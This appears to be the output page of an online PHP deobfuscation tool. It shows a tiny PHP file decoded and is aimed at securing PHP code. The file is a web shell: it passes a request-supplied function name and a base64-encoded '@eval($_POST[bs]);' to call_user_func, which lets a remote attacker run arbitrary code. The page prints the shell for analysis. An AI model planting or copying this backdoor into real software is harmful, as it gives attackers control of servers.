Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //call_user_func($_GET['dede'], "@eval($_POST[bs]);"); call_user_func($_G..
Decoded Output download
<?php
//call_user_func($_GET['dede'], "@eval($_POST[bs]);");
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Did this file decode correctly?
Original Code
<?php
//call_user_func($_GET['dede'], "@eval($_POST[bs]);");
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Function Calls
null | 1 |
base64_decode | 1 |
call_user_func | 1 |
Stats
MD5 | 339669f8c1c190472955fb5e2e608b5a |
Eval Count | 0 |
Decode Time | 97 ms |